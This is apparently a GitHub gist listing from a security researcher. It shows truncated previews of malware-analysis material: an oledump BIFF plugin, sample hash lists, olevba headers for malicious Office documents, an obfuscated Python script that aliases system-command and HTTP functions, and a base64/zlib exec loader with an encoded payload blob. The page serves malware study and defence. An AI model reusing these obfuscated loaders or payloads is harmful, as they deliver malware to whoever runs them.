John Lambert JohnLaTwC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| __description__ = 'BIFF plugin for oledump.py' | |
| __author__ = 'Didier Stevens' | |
| __version__ = '0.1.11' | |
| __date__ = '2020/03/29' | |
| # Slightly modified version by Philippe Lagadec to be imported into olevba | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sha256 | |
| 4894e27f9d31bcffa8cdbce4eade1ca48bc53ff838a702992ad6ec6220e38e8c | |
| 5076a4564d6ea29b2de45547d32a40a6d86beba2643941e3df5362ac35a90d3f | |
| b1b92d4f077809989f190d5506d26da4cf8f6fc83cd37bf75c667bc2b5c34057 | |
| 86992abe01076ea82e208f8873f531e26ba0c19dae7ce735089dfabcbf841a3e | |
| d427425dc16b6d0c24441e33274a5a39af5129e8b0d41434387ef2d8502a11b3 | |
| ee200e6bedf7dd4e120b886418407badd5dd3df2d2ea8bab13b733fc976e20bc | |
| 66df44df5b7ec5b5b0c05c7c6368d024ad05e1f25db911d71c6b77f5f52236c2 | |
| 8f1017560e27bcedc752798201a5f429c596d1d7f7190e08beac1545eaf69567 | |
| e9fa4c3587a26f24c4b86875c815b29d601c081e5b157aad06c68998b57d814d |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| __description__ = 'BIFF plugin for oledump.py' | |
| __author__ = 'Didier Stevens' | |
| __version__ = '0.0.9' | |
| __date__ = '2020/03/09' | |
| # Slightly modified version by Philippe Lagadec to be imported into olevba | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| __description__ = 'BIFF plugin for oledump.py' | |
| __author__ = 'Didier Stevens' | |
| __version__ = '0.0.6' | |
| __date__ = '2019/03/26' | |
| # Slightly modified version by Philippe Lagadec to be imported into olevba | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ccef64586d25ffcb2b28affc1f64319b936175c4911e7841a0e28ee6d6d4a02d | |
| 079be05edcd5793e1e3596cdb5f511324d0bcaf50eb47119236d3cb8defdfa4c | |
| 1d48a42a0b06a087e966b860c8f293a9bf57da8d70f5f83c61242afc5b81eb4f | |
| 081559b2830fe5535d3bcd001ae36a5e4e163ae6a6a2c8703fdc8d352e28ea0e | |
| 682f1aed02be7b38a0d53e437de9c742d36a74145178d9c10454415bbb96fd31 | |
| 0d3e830884ffebda7faa929dcf4838d424bcff4607904c9bb80b852ad85af52c | |
| eb98898fc5842b5f0e64def2ce8cf7a2a9faf7df8458d19c39a70e010d6764aa | |
| ca6406e5e06004311da9a691274ca08bc86f7f443e18a3579e860ffe57154e2b | |
| c627e3bcaf24d0b424abd67fcab37fd887f922dab35fb4f6ded9f3e28aaa9db0 | |
| 515d6665c7fcfd9a55fc6a0e4cb4d7eec5332e1d7dbebc64f49b5a8e67e643a4 |
JohnLaTwC
/ 144242e42335b015145100dbaebf902df3403244921cf81402f67778959c642e
Created
March 19, 2020 18:32
OSX maldoc threat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## Sample hash: 144242e42335b015145100dbaebf902df3403244921cf81402f67778959c642e | |
| olevba 0.55.1 on Python 3.7.6 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: 455e749c8f1fedbd9494d192a194b1a5b2c412244a6122f4a6a952fe15155e24 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls | |
| in file: 455e749c8f1fedbd9494d192a194b1a5b2c412244a6122f4a6a952fe15155e24 - OLE stream: 'VBA/ThisDocument' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
JohnLaTwC
/ python MITM
Created
March 18, 2020 13:01
e1be43d3f51bf5b82370a95d71e8d5d2c7d145fadf4b0e7df1e908dc2c218ecb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # e1be43d3f51bf5b82370a95d71e8d5d2c7d145fadf4b0e7df1e908dc2c218ecb | |
| import base64, bz2 | |
| def decode(string): | |
| key='C5697368-C6F9-571D-A025-44204FBF7027'.encode('utf-8') | |
| string = base64.urlsafe_b64decode(string.encode('utf-8') + b'===') | |
| dechars = [] | |
| for i in range(len(string)): | |
| mc = key[i % len(key)] |
JohnLaTwC
/ d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc
Created
March 17, 2020 21:38
maldoc event handler d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Sample hash: d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc / 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf | |
| olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf | |
| Type: OLE | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls |
JohnLaTwC
/ b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937
Created
March 17, 2020 14:37
random var names b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests,time,subprocess,sys,os | |
| silently=True | |
| foraging=input | |
| forest=print | |
| hunter=os.system | |
| jam=sys.exit | |
| toast=subprocess.run | |
| crust=time.sleep | |
| sand=requests.post | |
| lion=requests.get |
JohnLaTwC
/ b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937
Created
March 16, 2020 23:07
python malware b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## sample hash: b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937 | |
| import zlib, base64 | |
| exec(zlib.decompress(base64.b64decode('eJzs3fuT5Xd95/ff9Vd0DbU1UiyL7j6X7iOXqsJabIWyYQksu9nYW67RTCN6PepRpmfAxOUqgQChlQyDkHUBLGZ0GdBldAex3PxvOLB2ycUGY2Crz5+QM7qgsCZU8kPmPM/3PFKpxOYihO3Ha8S3P+957t9x55mz5zbO7v1v5/cOzx3eeG7/jr0bD8/fdufZMyf3Dg9vPPzk4Y1nDq+bX7j4yPzC00/On/jB38yfeuGl+YXLl+YPf+fe+YXn7ppfePn5+Te/8NT80uUH/+7F+WNPfGZ+8bUvzC+8+JX5c9/5xvzil7/8kwsPzy+9dt/Ra3fPH//ep+fPv/CZ+YVn7p5f+Oar8wuffvkn3/ra/MKlL/34hcUf7NH5Y9+9d/70F5/5P7/17NErX51fePChf3r2nvljT352/vhX/2r+yN3f/y8X50994+vzC99/8OjKd35+9wvziw/eO3/2ycvzbz68+PsfeWrxj33i75+YP3fPQ/NHvvbln7/y1b99cf7wQ5+fP3bptfmVR742v3jp7qPvvji//K3X/ttnfjB/5K5L8yce/Zv/8o0fPT2/cOW++WPfuf/ohR/Mn/z0Dxf/Dr/+o2/Pn/zB1+ZPPffD+dPPvfr6M/f84oc/mF948pXFn/0Di3+de+dX/vLBX9z19Pzi5a/84q5v/OyRR39+92fmD3/v8uLvu7T4Q31r/sRn7/vpF58/euWef3rupb/77vyxp+7+0Vfml569e/7Y49/7r5975Oj5h+YX/vqv/u7Rn33nO0evXpk/ffnC/MIrX58/98A98yf+6sr8m99+7Kffvfz3n/pv9z4yf/Lxexf/rJfmT375Uz978cn5Ny4/sPif8 |